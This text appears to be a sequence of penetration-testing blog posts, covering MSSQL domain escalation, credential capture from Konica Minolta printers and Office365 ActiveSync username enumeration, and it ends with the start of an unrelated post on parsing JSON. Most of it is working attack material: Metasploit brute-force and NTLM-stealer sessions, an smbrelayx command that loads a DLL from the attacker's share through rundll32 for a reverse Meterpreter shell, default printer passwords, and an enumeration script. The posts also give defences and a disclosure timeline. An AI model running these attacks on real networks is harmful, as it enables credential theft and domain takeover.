MSSQL : You get admin! You get admin! EVERYONE GETS ADMIN!

TLDR: Domain Users permitted to authenticate to Microsoft SQL databases can use the limited privileges they are granted to run a stored procedure. The stored procedure can be used to send the database service's credentials over the network. When the database service is configured to run as a privileged account, those credentials can be cracked offline or relayed in order to escalate privileges. I have exploited this multiple times to escalate from domain user to domain administrator!

Finding MSSQL Server Instances

There are multiple methods to identify Microsoft SQL (MSSQL) Server Instances.

DNS

Including Domain Name Service (DNS) service records (SRV):

nslookup -type=SRV _sql._tcp.contoso.com
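
The same lookup can be scripted (a quick sketch assuming the dnspython library; contoso.com is the example domain used throughout this post):

import dns.resolver

# Each SRV record discloses the host and port of a registered SQL Server instance.
for record in dns.resolver.resolve("_sql._tcp.contoso.com", "SRV"):
    print(record.target, record.port)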

SPNs

Kerberos Service Principal Names (SPN):

ldapsearch -h dc1.contoso.com -b "DC=contoso,DC=com" -D "myuser@contoso.com" -W "servicePrincipalName=MSSQLSvc/*" "servicePrincipalName" | grep MSSQLSvc

Port Scanning

Or, of course, port scanning. However, note that if you only scan the default ports (TCP 1433 and 2433) you will miss a lot of instances running on random ports. Instead you may wish to perform a UDP scan for port 1434, which is used by the SQL Browser Service.

MSSQL Ping

This is my preferred method at the moment.

A number of utilities exist which can scan a network and interact with the MSSQL Browser Service in order to identify the TCP ports the MSSQL instances are running on.

However, the tool I prefer is the Metasploit auxiliary module mssql_ping, used together with the Metasploit database.

msf > use auxiliary/scanner/mssql/mssql_ping

msf auxiliary(scanner/mssql/mssql_ping) > set rhosts 10.0.0.0/22
 rhosts => 10.0.0.0/22
 msf auxiliary(scanner/mssql/mssql_ping) > workspace -a test
 [*] Added workspace: test
 msf auxiliary(scanner/mssql/mssql_ping) > show options

Module options (auxiliary/scanner/mssql/mssql_ping):

   Name                 Current Setting  Required  Description
   ----                 ---------------  --------  -----------
   PASSWORD                              no        The password for the specified username
   RHOSTS               10.0.0.0/22      yes       The target address range or CIDR identifier
   TDSENCRYPTION        false            yes       Use TLS/SSL for TDS data "Force Encryption"
   THREADS              1                yes       The number of concurrent threads
   USERNAME             sa               no        The username to authenticate as
   USE_WINDOWS_AUTHENT  false            yes       Use windows authentification (requires DOMAIN option set)

msf auxiliary(scanner/mssql/mssql_ping) > set threads 20
 threads => 20
 msf auxiliary(scanner/mssql/mssql_ping) > run
 [*] 10.0.3.7: - SQL Server information for 10.0.3.7:
 [+] 10.0.3.7: - ServerName = TESTDMZ
 [+] 10.0.3.7: - InstanceName = MSSQLSERVER
 [+] 10.0.3.7: - IsClustered = No
 [+] 10.0.3.7: - Version = 9.00.5000.00
 [+] 10.0.3.7: - tcp = 5693
 [*] Scanned 1024 of 1024 hosts (100% complete)
 [*] Auxiliary module execution completed
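
If you just want a quick standalone check of a single host without Metasploit, the SQL Browser service can be queried directly. Below is a minimal sketch in Python: it sends an SSRP CLNT_UCAST_EX request (a single 0x03 byte) to UDP 1434 and prints the instance details that come back (the target address is the example host from above).

import socket

def mssql_ping(host, timeout=2):
    # Ask the SQL Browser service which instances exist and which TCP ports they use.
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    sock.settimeout(timeout)
    try:
        sock.sendto(b"\x03", (host, 1434))  # CLNT_UCAST_EX: list all instances on this host
        data, _ = sock.recvfrom(65535)
    except socket.timeout:
        return None
    finally:
        sock.close()
    # Response: 0x05, a 2 byte length, then semicolon separated key;value pairs
    # (ServerName, InstanceName, IsClustered, Version, tcp, ...).
    return data[3:].decode("ascii", errors="replace")

print(mssql_ping("10.0.3.7"))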

Login to MSSQL

There are multiple utilities to bruteforce MSSQL logins; however, I use Metasploit's mssql_login module. One thing to note when using this module with Windows authentication is that the DOMAIN parameter is required but not shown in the normal options output.

Since MSSQL server instances may be on inconsistent ports across hosts, I use a modified version of mssql_brute.rc – a Metasploit resource script.

msf auxiliary(scanner/mssql/mssql_ping) > use auxiliary/scanner/mssql/mssql_login
 msf auxiliary(scanner/mssql/mssql_login) > show options

Module options (auxiliary/scanner/mssql/mssql_login):

   Name                 Current Setting  Required  Description
   ----                 ---------------  --------  -----------
   BLANK_PASSWORDS      false            no        Try blank passwords for all users
   BRUTEFORCE_SPEED     5                yes       How fast to bruteforce, from 0 to 5
   DB_ALL_CREDS         false            no        Try each user/password couple stored in the current database
   DB_ALL_PASS          false            no        Add all passwords in the current database to the list
   DB_ALL_USERS         false            no        Add all users in the current database to the list
   PASSWORD                              no        A specific password to authenticate with
   PASS_FILE                             no        File containing passwords, one per line
   RHOSTS                                yes       The target address range or CIDR identifier
   RPORT                5693             yes       The target port (TCP)
   STOP_ON_SUCCESS      false            yes       Stop guessing when a credential works for a host
   TDSENCRYPTION        false            yes       Use TLS/SSL for TDS data "Force Encryption"
   THREADS              1                yes       The number of concurrent threads
   USERNAME                              no        A specific username to authenticate as
   USERPASS_FILE                         no        File containing users and passwords separated by space, one pair per line
   USER_AS_PASS         false            no        Try the username as the password for all users
   USER_FILE                             no        File containing usernames, one per line
   USE_WINDOWS_AUTHENT  false            yes       Use windows authentification (requires DOMAIN option set)
   VERBOSE              true             yes       Whether to print output for all attempts

msf auxiliary(scanner/mssql/mssql_login) > set domain CONTOSO
 domain => CONTOSO
msf auxiliary(scanner/mssql/mssql_login) > set use_windows_authent true
 use_windows_authent => true
 msf auxiliary(scanner/mssql/mssql_login) > set username MyUser
 username => MyUser
 msf auxiliary(scanner/mssql/mssql_login) > set password MyPassword
 password => MyPassword

msf auxiliary(scanner/mssql/mssql_login) > resource mssql_brute.rc
 [*] Processing /opt/metasploit-framework/embedded/framework/scripts/resource/mssql_brute.rc for ERB directives.
 [*] resource (/opt/metasploit-framework/embedded/framework/scripts/resource/mssql_domain_login.rc)> Ruby Code (1048 bytes)
 RHOSTS => 10.0.3.7
 RPORT => 5693
 BRUTEFORCE_SPEED => 5
 BLANK_PASSWORDS => false
 USER_AS_PASS => false
 [*] 10.0.3.7:5693 - 10.0.3.7:5693 - MSSQL - Starting authentication scanner.
 [-] 10.0.3.7:5693 - 10.0.3.7:5693 - LOGIN SUCCESS: CONTOSO\MyUser:MyPassword (Correct: )
 [*] Scanned 1 of 1 hosts (100% complete)
 [*] Auxiliary module execution completed

Executing Extended Stored Procedures

There are a number of extended stored procedures within MSSQL Server that can be useful to an attacker. Although some, like xp_cmdshell, require elevated permissions within the database, others such as xp_dirtree and xp_fileexist can be executed with the guest permissions often granted to the domain users group.

xp_dirtree and xp_fileexist

These two stored procedures can be invoked with a UNC path in order to cause the database service to connect to the attacker’s machine over SMB.
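
As a rough illustration (a sketch assuming the pymssql library and the example hosts and credentials used in this post), the calls look like this:

import pymssql

# Example values from this post - adjust to the real instance, port and credentials.
conn = pymssql.connect(server="10.0.3.7", port=5693,
                       user="CONTOSO\\MyUser", password="MyPassword")
cursor = conn.cursor()
# The UNC path points at the attacker's SMB listener; the connection is made by the
# database service account, not the low privileged user we authenticated as.
cursor.execute(r"EXEC master..xp_dirtree '\\10.0.0.2\share', 1, 1")
cursor.execute(r"EXEC master..xp_fileexist '\\10.0.0.2\share\file.txt'")
conn.close()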

Privileges of the Database Service

Even though we have connected to the database using domain credentials, the stored procedure is executed under the context of the account the database service is running as.

The MSSQL service can be configured to run as the local system account (a terrible idea, as escalating privileges within the database also compromises the server), a local service account, a local account, a domain account, or a domain managed service account.

The misconfiguration I regularly see is for the database service to be running as a domain account with significant privileges – local administrator within the server estate, or even domain administrator!

Exploitation

There are two methods of exploiting this series of misconfigurations.

Capturing the Hash

First, you can simply capture the hash and subject it to an offline bruteforce attack. This relies on the account being configured with a sufficiently weak password.

Multiple tools can be used to perform this attack such as Responder, or the Metasploit SMB Capture module.

I am not going to go into detail in this area as it is extensively covered elsewhere (for example HollyGraceful’s post).

SMB Relay

As always there are various tools to accomplish this as this technique has been around a long time.

I use smbrelayx.py from the Impacket library to relay the authentication to a host with SMB signing disabled, and use rundll32 to load a malicious DLL from a network share which establishes a reverse Meterpreter shell.

In order to do this you need two IP addresses, as smbrelayx.py and the network share hosting the payload both need to listen on the same port. This can be accomplished with the following command, assuming eth0 is your network interface.

ifconfig eth0:0 10.0.0.2 netmask 255.255.255.0

We can then create and host the payload using the generic_smb_dll_injection Metasploit module by @_castleinthesky.

msf auxiliary(scanner/mssql/mssql_login) > use exploit/windows/smb/generic_smb_dll_injection

msf exploit(windows/smb/generic_smb_dll_injection) > set file_name exploit.dll
 file_name => exploit.dll
 msf exploit(windows/smb/generic_smb_dll_injection) > set share share
 share => share
msf exploit(windows/smb/generic_smb_dll_injection) > set srvhost 10.0.0.2
 srvhost => 10.0.0.2
 msf exploit(windows/smb/generic_smb_dll_injection) > set payload windows/x64/meterpreter/reverse_https
 payload => windows/x64/meterpreter/reverse_https

msf exploit(windows/smb/generic_smb_dll_injection) > set lhost 10.0.0.2
 lhost => 10.0.0.2
 msf exploit(windows/smb/generic_smb_dll_injection) > run
 [*] Exploit running as background job 0.

With our payload ready we can run smbrelayx.py pointing to a host with SMB signing disabled (by default, all Windows hosts except domain controllers):

sudo smbrelayx.py -h targethost -c 'rundll32 \\10.0.0.2\share\exploit.dll,1'

We can then use the xp_dirtree and xp_fileexist stored procedures to trigger the authentication. To do this I use the Metasploit module mssql_ntlm_stealer:

msf auxiliary(admin/mssql/mssql_ntlm_stealer) > set rport 5693
 rport => 5693
 msf auxiliary(admin/mssql/mssql_ntlm_stealer) > set rhosts 10.0.0.7
 rhosts => 10.0.0.7
 msf auxiliary(admin/mssql/mssql_ntlm_stealer) > set username myuser
username => myuser
 msf auxiliary(admin/mssql/mssql_ntlm_stealer) > set password MyPassword
 password => MyPassword
 msf auxiliary(admin/mssql/mssql_ntlm_stealer) > set domain CONTOSO
 domain => CONTOSO
 msf auxiliary(admin/mssql/mssql_ntlm_stealer) > set use_windows_authent true
 use_windows_authent => true
 msf auxiliary(admin/mssql/mssql_ntlm_stealer) > run

When the database service is running with administrative permissions, this can result in complete compromise of the domain.

Meterpreter Session 1 Opened

Defense

There is a series of insecure configurations at play here; I would recommend addressing them all to harden your environment. Most significantly, follow the principle of least privilege (items 1 and 2 below).

  1. Reconfigure the database to prevent authentication by all domain users. Ensure that only those who require access can authenticate to the database.
  2. Reconfigure the database service to run with minimum privileges, never as local system or an administrative account.
  3. Enable SMB signing, to prevent SMB Relay attacks.

It’s just a printer… What’s the worst that could happen?

As you would expect, office printers are often identified when conducting a penetration test of an office network. These devices often seem to be overlooked, as there are usually more interesting and direct possibilities to pursue. However, as organisations become more security conscious and close the wide open doors that have typically beckoned to me at the start of an assessment, I have taken a renewed interest in these forgotten targets.

The type of printer I seem to see a lot on my engagements is Konica Minolta, so that is what I am going to discuss. However, I imagine many other makes can be exploited in a similar fashion.

Management Interface

Like a lot of systems, Konica Minolta printers have a web management interface presented on port 80/443. A password is required in order to access the administrative settings; unfortunately for a lot of organisations, it is a default password that can be found with a quick Google search. There are a few variations depending on the model, but I usually find it is ‘1234567812345678’ or ‘12345678’.

A variety of options are available, however the one that has recently caught my attention is the LDAP connection settings.

A quick word about LDAP and AD

“The Lightweight Directory Access Protocol (LDAP) is a directory service protocol that runs on a layer above the TCP/IP stack. It provides a mechanism used to connect to, search, and modify Internet directories.” – https://msdn.microsoft.com/en-us/library/aa367008(v=vs.85).aspx

In a Windows domain environment you can use LDAP to interact with Active Directory.

AD will allow a small amount of information to be disclosed with a ‘null bind’ (i.e. no username or password), however nothing like as much as the null sessions of old. In order to obtain a list of users, a valid username and password must be used to bind to the server.
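
As a rough illustration (assuming the ldap3 Python library and the example names used elsewhere in this post), a null bind succeeds but only exposes server metadata, while listing users requires an authenticated bind:

from ldap3 import Server, Connection, ALL

server = Server("dc1.contoso.com", get_info=ALL)

# Null (anonymous) bind: AD accepts it, but only rootDSE-style metadata is available.
anonymous = Connection(server, auto_bind=True)
print(server.info)

# Authenticated bind: required before AD will return directory objects such as user accounts.
authed = Connection(server, user="CONTOSO\\MyUser", password="MyPassword", auto_bind=True)
authed.search("DC=contoso,DC=com", "(objectClass=user)", attributes=["sAMAccountName"])
print(len(authed.entries))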

LDAP settings

On Konica Minolta printers it is possible to configure an LDAP server to connect to, along with credentials. In earlier versions of the firmware on these devices I have heard it is possible to recover the credentials simply by reading the HTML source of the page. Now, however, the credentials are not returned in the interface, so we have to work a little harder.

The list of LDAP Servers is under: Network > LDAP Setting > Setting Up LDAP

The interface allows the LDAP server to be modified without re-entering the credentials that will be used to connect. I presume this is for a simpler user experience, but it gives an attacker an opportunity to escalate from master of a printer to a toehold on the domain.

We can reconfigure the LDAP server address setting to a machine we control, and trigger a connection with the helpful “Test Connection” functionality.

Listening for the goods

netcat

If you have better luck than me, you may be able to get away with a simple netcat listener:

sudo nc -k -v -l -p 389

I am assured by @_castleinthesky that this works most of the time, however I have yet to be let off that easy.

Slapd

I have found that a full LDAP server is required, as the printer first attempts a null bind and then queries the available information; only if these operations are successful does it proceed to bind with the configured credentials.

I searched for a simple LDAP server that met these requirements, however there seemed to be limited options. In the end I opted to set up an OpenLDAP server and use slapd in debug mode to accept connections and print out the messages from the printer. (If you know of an easier alternative, I would be happy to hear about it.)

Installation

(Note this section is a lightly adapted version of the guide here https://www.server-world.info/en/note?os=Fedora_26&p=openldap )

From a root terminal:

Install OpenLDAP,

#> dnf install -y openldap-servers openldap-clients

#> cp /usr/share/openldap-servers/DB_CONFIG.example /var/lib/ldap/DB_CONFIG 

#> chown ldap. /var/lib/ldap/DB_CONFIG

Set an OpenLDAP admin password (you will need this again shortly)

#> slappasswd 
New password:
Re-enter new password:
{SSHA}xxxxxxxxxxxxxxxxxxxxxxxx
#> vim chrootpw.ldif
# specify the password generated above for "olcRootPW" section
dn: olcDatabase={0}config,cn=config
changetype: modify
add: olcRootPW
olcRootPW: {SSHA}xxxxxxxxxxxxxxxxxxxxxxxx
#> ldapadd -Y EXTERNAL -H ldapi:/// -f chrootpw.ldif
SASL/EXTERNAL authentication started
SASL username: gidNumber=0+uidNumber=0,cn=peercred,cn=external,cn=auth
SASL SSF: 0
modifying entry "olcDatabase={0}config,cn=config"

Import basic Schemas

#> ldapadd -Y EXTERNAL -H ldapi:/// -f /etc/openldap/schema/cosine.ldif 
SASL/EXTERNAL authentication started
SASL username: gidNumber=0+uidNumber=0,cn=peercred,cn=external,cn=auth
SASL SSF: 0
adding new entry "cn=cosine,cn=schema,cn=config"

#> ldapadd -Y EXTERNAL -H ldapi:/// -f /etc/openldap/schema/nis.ldif 
SASL/EXTERNAL authentication started
SASL username: gidNumber=0+uidNumber=0,cn=peercred,cn=external,cn=auth
SASL SSF: 0
adding new entry "cn=nis,cn=schema,cn=config"

#> ldapadd -Y EXTERNAL -H ldapi:/// -f /etc/openldap/schema/inetorgperson.ldif 
SASL/EXTERNAL authentication started
SASL username: gidNumber=0+uidNumber=0,cn=peercred,cn=external,cn=auth
SASL SSF: 0
adding new entry "cn=inetorgperson,cn=schema,cn=config"

Set your domain name on LDAP DB.

# generate directory manager's password
#> slappasswd 
New password:
Re-enter new password:
{SSHA}xxxxxxxxxxxxxxxxxxxxxxxx

#> vim chdomain.ldif
# specify the password generated above for "olcRootPW" section
dn: olcDatabase={1}monitor,cn=config
changetype: modify
replace: olcAccess
olcAccess: {0}to * by dn.base="gidNumber=0+uidNumber=0,cn=peercred,cn=external,cn=auth"
read by dn.base="cn=Manager,dc=foo,dc=bar" read by * none

dn: olcDatabase={2}mdb,cn=config
changetype: modify
replace: olcSuffix
olcSuffix: dc=foo,dc=bar

dn: olcDatabase={2}mdb,cn=config
changetype: modify
replace: olcRootDN
olcRootDN: cn=Manager,dc=foo,dc=bar

dn: olcDatabase={2}mdb,cn=config
changetype: modify
add: olcRootPW
olcRootPW: {SSHA}xxxxxxxxxxxxxxxxxxxxxxxx

dn: olcDatabase={2}mdb,cn=config
changetype: modify
add: olcAccess
olcAccess: {0}to attrs=userPassword,shadowLastChange by
dn="cn=Manager,dc=foo,dc=bar" write by anonymous auth by self write by * none
olcAccess: {1}to dn.base="" by * read
olcAccess: {2}to * by dn="cn=Manager,dc=foo,dc=bar" write by * read

#> ldapmodify -Y EXTERNAL -H ldapi:/// -f chdomain.ldif 
SASL/EXTERNAL authentication started
SASL username: gidNumber=0+uidNumber=0,cn=peercred,cn=external,cn=auth
SASL SSF: 0
modifying entry "olcDatabase={1}monitor,cn=config"

modifying entry "olcDatabase={2}mdb,cn=config"

modifying entry "olcDatabase={2}mdb,cn=config"

modifying entry "olcDatabase={2}mdb,cn=config"

modifying entry "olcDatabase={2}mdb,cn=config"

#> vim basedomain.ldif
dn: dc=foo,dc=bar
objectClass: top
objectClass: dcObject
objectclass: organization
o: Foo Bar
dc: foo

dn: cn=Manager,dc=foo,dc=bar
objectClass: organizationalRole
cn: Manager
description: Directory Manager

dn: ou=People,dc=foo,dc=bar
objectClass: organizationalUnit
ou: People

dn: ou=Group,dc=foo,dc=bar
objectClass: organizationalUnit
ou: Group

#> ldapadd -x -D cn=Manager,dc=foo,dc=bar -W -f basedomain.ldif 
Enter LDAP Password: # directory manager's password
adding new entry "dc=foo,dc=bar"

adding new entry "cn=Manager,dc=foo,dc=bar"

adding new entry "ou=People,dc=foo,dc=bar"

adding new entry "ou=Group,dc=foo,dc=bar"

Configure LDAP TLS

Create an SSL Certificate
#> cd /etc/pki/tls/certs 
#> make server.key 
umask 77 ; \
/usr/bin/openssl genrsa -aes128 2048 > server.key
Generating RSA private key, 2048 bit long modulus
...
...
e is 65537 (0x10001)
Enter pass phrase: # set passphrase
Verifying - Enter pass phrase: # confirm

# remove passphrase from private key
#> openssl rsa -in server.key -out server.key 
Enter pass phrase for server.key: # input passphrase
writing RSA key

#> make server.csr 
umask 77 ; \
/usr/bin/openssl req -utf8 -new -key server.key -out server.csr
You are about to be asked to enter information that will be incorporated
into your certificate request.
What you are about to enter is what is called a Distinguished Name or a DN.
There are quite a few fields but you can leave some blank
For some fields there will be a default value,
If you enter '.', the field will be left blank.
-----
Country Name (2 letter code) [XX]: # country
State or Province Name (full name) []: # state
Locality Name (eg, city) [Default City]: # city
Organization Name (eg, company) [Default Company Ltd]: # company
Organizational Unit Name (eg, section) []:Foo Bar # department
Common Name (eg, your name or your server's hostname) []:www.foo.bar # server's FQDN
Email Address []:xxx@foo.bar # admin email
Please enter the following 'extra' attributes
to be sent with your certificate request
A challenge password []: # Enter
An optional company name []: # Enter

#> openssl x509 -in server.csr -out server.crt -req -signkey server.key -days 3650
Signature ok
subject=/C=/ST=/L=/O=/OU=Foo Bar/CN=dlp.foo.bar/emailAddress=xxx@roo.bar
Getting Private key
Configure Slapd for SSL/TLS
#> cp /etc/pki/tls/certs/server.key \
/etc/pki/tls/certs/server.crt \
/etc/pki/tls/certs/ca-bundle.crt \
/etc/openldap/certs/

#> chown ldap. /etc/openldap/certs/server.key \
/etc/openldap/certs/server.crt \
/etc/openldap/certs/ca-bundle.crt

#> vim mod_ssl.ldif
# create new
dn: cn=config
changetype: modify
add: olcTLSCACertificateFile
olcTLSCACertificateFile: /etc/openldap/certs/ca-bundle.crt
-
replace: olcTLSCertificateFile
olcTLSCertificateFile: /etc/openldap/certs/server.crt
-
replace: olcTLSCertificateKeyFile
olcTLSCertificateKeyFile: /etc/openldap/certs/server.key

#> ldapmodify -Y EXTERNAL -H ldapi:/// -f mod_ssl.ldif 
SASL/EXTERNAL authentication started
SASL username: gidNumber=0+uidNumber=0,cn=peercred,cn=external,cn=auth
SASL SSF: 0
modifying entry "cn=config"

Allow LDAP through your local firewall

firewall-cmd --add-service={ldap,ldaps}

The payoff

Once you have installed and configured your LDAP service, you can run it with the following command:

slapd -d 2

The screenshot below shows an example of the output when we run the connection test on the printer. As you can see, the username and password are passed from the LDAP client to the server.

slapd terminal output containing the username "MyUser" and password "MyPassword"

How bad can it be?

This very much depends on the credentials that have been configured.

If the principle of least privilege is being followed, then you may only get read access to certain elements of Active Directory. This is often still valuable, as you can use that information to formulate further, more accurate attacks.

Typically you are likely to get an account in the Domain Users group which may give access to sensitive information or form the prerequisite authentication for other attacks.

Or, like me, you may be rewarded for setting up an LDAP server and be handed a Domain Admin account on a silver platter.

Defence

This is not an issue with the device, it is doing exactly what it is supposed to do. You just need to configure it more securely 🙂

Defending against this issue should be relatively easy.

Change the default admin password to something long and complex, in line with your organisation’s password policy.

Do not use highly privileged accounts for a printer’s LDAP queries. Do use the principle of least privilege.

If possible, restrict access to the administration interface to trusted hosts.

Office365 ActiveSync Username Enumeration

TLDR:

There is a simple username enumeration issue in Office365’s ActiveSync. Microsoft do not consider this a vulnerability, so I don’t expect they will fix it. I have written a script to exploit it, which is available here: https://bitbucket.org/grimhacker/office365userenum

What is ActiveSync?

Exchange ActiveSync in Microsoft Exchange Server lets Windows Mobile powered devices and other Exchange ActiveSync enabled devices to access Exchange mailbox data. Compatible mobile devices can access e-mail, calendar, contact, and task data in addition to documents stored on Windows SharePoint Services sites and Windows file shares. Information synchronized with the mobile devices is retained and can be accessed offline. [https://technet.microsoft.com/en-us/library/aa995986(v=exchg.65).aspx]

What is username enumeration?

Username enumeration is when an attacker can determine valid users in a system.

When the system reveals that a username exists, either due to misconfiguration or a design decision, a username enumeration issue exists.

This is often identified in authentication interfaces, registration forms, and forgotten password functionality.

The information disclosed by the system can be used to determine a list of users, which can then be used in further attacks such as bruteforcing – since the username is known to be correct, only the password needs to be guessed, greatly increasing the chances of successfully compromising an account.

The vulnerability

During the assessment of a 3rd party product which utilises ActiveSync, it was noted that there was a clear difference in the responses to valid and invalid usernames submitted in the HTTP Basic Authentication header.

Further investigation revealed that the issue was in fact in Office365 rather than in the 3rd party product, which was simply acting as a proxy. The domain for Office365’s ActiveSync service is trivial to identify if you have a mobile device configured to use Office365 for email (it is in the email app’s server settings): https://outlook.office365.com

In order to elicit a response from ActiveSync a number of parameters and headers are required; this is described in more detail here: http://mobilitydojo.net/2010/03/17/digging-into-the-exchange-activesync-protocol/

The username enumeration issue exists in the differing response to invalid vs valid usernames submitted in the Authorization header. This request header value consists of the username and password concatenated with a colon (:) separator and Base64 encoded.
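
For example, the header value for valid_user@contoso.com with the password Password1 can be constructed like this:

import base64

credentials = "valid_user@contoso.com:Password1"
print("Authorization: Basic " + base64.b64encode(credentials.encode()).decode())
# Authorization: Basic dmFsaWRfdXNlckBjb250b3NvLmNvbTpQYXNzd29yZDE=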

The request below contains the following Base64 encoded credentials in the Authorization header: valid_user@contoso.com:Password1

OPTIONS /Microsoft-Server-ActiveSync HTTP/1.1
Host: outlook.office365.com
Connection: close
MS-ASProtocolVersion: 14.0
Content-Length: 0
Authorization: Basic dmFsaWRfdXNlckBjb250b3NvLmNvbTpQYXNzd29yZDE=

This elicits the following response (“401 Unauthorized”) indicating that the username is valid but the password is not:

HTTP/1.1 401 Unauthorized
Content-Length: 1293
Content-Type: text/html
Server: Microsoft-IIS/8.5
request-id: ab308ea5-9a01-4a1a-8d49-b91b3503e83f
X-CalculatedFETarget: LO1P123CU001.internal.outlook.com
X-BackEndHttpStatus: 401
WWW-Authenticate: Basic Realm="",Negotiate,Basic Realm=""
X-FEProxyInfo: LO1P123CA0018.GBRP123.PROD.OUTLOOK.COM
X-CalculatedBETarget: LO1P123MB0899.GBRP123.PROD.OUTLOOK.COM
X-BackEndHttpStatus: 401
X-DiagInfo: LO1P123MB0899
X-BEServer: LO1P123MB0899
X-FEServer: LO1P123CA0018
WWW-Authenticate: Basic Realm=""
X-Powered-By: ASP.NET
X-FEServer: VI1PR0101CA0050
Date: Wed, 14 Jun 2017 14:35:14 GMT
Connection: close
<snip>

The request below contains the following Base64 encoded credentials in the Authorization header: invalid_user@contoso.com:Password1

OPTIONS /Microsoft-Server-ActiveSync HTTP/1.1
Host: outlook.office365.com
Connection: close
MS-ASProtocolVersion: 14.0
Content-Length: 2
Authorization: Basic aW52YWxpZF91c2VyQGNvbnRvc28uY29tOlBhc3N3b3JkMQ==

This elicits the following response (“404 Not Found” and “X-CasErrorCode: UserNotFound”), indicating that the username is invalid:

HTTP/1.1 404 Not Found
Cache-Control: private
Server: Microsoft-IIS/8.5
request-id: 6fc1ee3a-ec99-4210-8a4c-12967a4639fc
X-CasErrorCode: UserNotFound
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
X-FEServer: HE1PR05CA0220
Date: Wed, 28 Jun 2017 11:23:03 GMT
Connection: close
Content-Length: 0

By iterating through a list of potential usernames and observing the responses, it is possible to enumerate a list of valid users which can then be targeted for further attacks. These attacks may be directly against the authentication, i.e. attempting to guess the user’s password to compromise their account, or part of a social engineering attack, e.g. sending phishing emails to known valid users.

It should be noted that this issue requires an authentication attempt and is therefore likely to appear in logs, and carries a risk of locking out accounts. However, it is also possible that a valid username and password combination will be identified, in which case the response differs depending on whether 2FA is enabled.

If 2FA is enabled the response is (“403 Forbidden” with title “403 – Forbidden: Access is denied.”):

HTTP/1.1 403 Forbidden
Cache-Control: private
Content-Length: 1233
Content-Type: text/html
Server: Microsoft-IIS/8.5
request-id: 4095f6fa-5151-4699-9ea1-0ddf0cfab897
X-CalculatedBETarget: MM1P123MB0842.GBRP123.PROD.OUTLOOK.COM
X-BackEndHttpStatus: 403
Set-Cookie: <snip>
X-MS-Credentials-Expire: 4
X-MS-Credential-Service-Federated: false
X-MS-Credential-Service-Url: https://portal.microsoftonline.com/ChangePassword.aspx
X-MS-BackOffDuration: L/-480
X-AspNet-Version: 4.0.30319
X-DiagInfo: MM1P123MB0842
X-BEServer: MM1P123MB0842
X-Powered-By: ASP.NET
X-FEServer: DB6PR07CA0008
Date: Fri, 07 Jul 2017 13:11:22 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/>
<title>403 - Forbidden: Access is denied.</title>
<--snip-->

If 2FA is NOT enabled the response is (“200 OK”):

HTTP/1.1 200 OK
Cache-Control: private
Allow: OPTIONS,POST
Content-Length: 0
Content-Type: application/vnd.ms-sync.wbxml
Server: Microsoft-IIS/8.5
request-id: da269652-6e98-4b49-8f14-ab57e7232b17
X-CalculatedFETarget: MMXP123CU001.internal.outlook.com
X-BackEndHttpStatus: 200
X-FEProxyInfo: MMXP123CA0005.GBRP123.PROD.OUTLOOK.COM
X-CalculatedBETarget: MMXP123MB0750.GBRP123.PROD.OUTLOOK.COM
X-BackEndHttpStatus: 200
MS-Server-ActiveSync: 15.1
MS-ASProtocolVersions: 2.0,2.1,2.5,12.0,12.1,14.0,14.1,16.0,16.1
MS-ASProtocolCommands: Sync,SendMail,SmartForward,SmartReply,GetAttachment,GetHierarchy,CreateCollection,DeleteCollection,MoveCollection,FolderSync,FolderCreate,FolderDelete,FolderUpdate,MoveItems,GetItemEstimate,MeetingResponse,Search,Settings,Ping,ItemOperations,Provision,ResolveRecipients,ValidateCert,Find
Public: OPTIONS,POST
X-MS-BackOffDuration: L/-470
X-AspNet-Version: 4.0.30319
X-DiagInfo: MMXP123MB0750
X-BEServer: MMXP123MB0750
X-FEServer: MMXP123CA0005
X-Powered-By: ASP.NET
X-FEServer: AM5P190CA0027
Date: Mon, 24 Jul 2017 09:50:22 GMT
Connection: close

It should be noted that only users with a valid mailbox are considered valid in this context; therefore a domain account may exist which this enumeration would identify as invalid.

I also checked if this issue affected Microsoft Exchange, or if it was limited to Office365. In my testing I found that only Office365 was affected. I reported this issue to Microsoft, however they do not consider username enumeration to “meet the bar for security servicing”, so I do not expect they will fix this issue.

My continuing mission to replace myself with a small script

In order to automate exploitation of this issue I wrote a simple multi-threaded Python script. It is available here: https://bitbucket.org/grimhacker/office365userenum

When provided with a list of potential usernames (username@domain), this script will attempt to authenticate to ActiveSync with the password ‘Password1’. Valid and invalid usernames are logged, along with valid username and password combinations (in case you get lucky).
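
The core check is small enough to sketch here (an illustration using the Python requests library, not the actual office365userenum code; the status code handling follows the responses shown above):

import requests
from requests.auth import HTTPBasicAuth

URL = "https://outlook.office365.com/Microsoft-Server-ActiveSync"

def check_user(username, password="Password1"):
    response = requests.options(URL, auth=HTTPBasicAuth(username, password),
                                headers={"MS-ASProtocolVersion": "14.0"})
    if response.status_code == 401:
        return "valid username"        # right user, wrong password
    if response.status_code == 404:
        return "invalid username"      # X-CasErrorCode: UserNotFound
    if response.status_code in (200, 403):
        return "valid credentials"     # 403 indicates 2FA is enabled
    return "unknown ({})".format(response.status_code)

print(check_user("valid_user@contoso.com"))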

Disclosure Timeline

28 June 2017, 13:30: Emailed secure@microsoft.com with a PGP encrypted PDF explaining the issue with example HTTP requests and responses.

28 June 2017, 22:39: Response from Microsoft (note only relevant section of email included below)

“Thank you for contacting the Microsoft Security Response Center (MSRC).  Upon investigation we have determined that these do not meet the bar for security servicing.  In general, username enumeration does not meet the bar as there are many ways to do this and on its own it does not allow an attacker access or control in any way, as the attacker would still need to bypass login.”

29 June 2017, 09:54: Emailed Microsoft stating intention to disclose in a blog post unless they had any serious objections.

24 July 2017: Details and tool disclosed to the public.

Although I do not agree with Microsoft’s determination that username enumeration is not a security vulnerability, I would like to thank them again for their speedy investigation and response to my report.

Loading Dirty JSON With Python

Recently I needed to parse some data embedded in HTML. At first glance it appeared to be JSON, so after pulling the text out of the HTML using BeautifulSoup, I tried to load it using the json module; however, this immediately threw an error:

ValueError: Expecting property name enclosed in double quotes: line 1 column 2 (char 1)

This is because, despite first appearances, the data I was trying to extract was a Python object built from strings, lists, integers, floats, and dictionaries which had been passed to the ‘print’ statement. But it was quite close to JSON, so I decided that the best course of action in this instance was to ‘fix’ the data so that I could load it as JSON.

First, as the error above indicates, double quotes are required, not the single quotes (mostly, but not always, prefixed with a ‘u’ indicating unicode) which my data had.

After removing these I encountered the error:

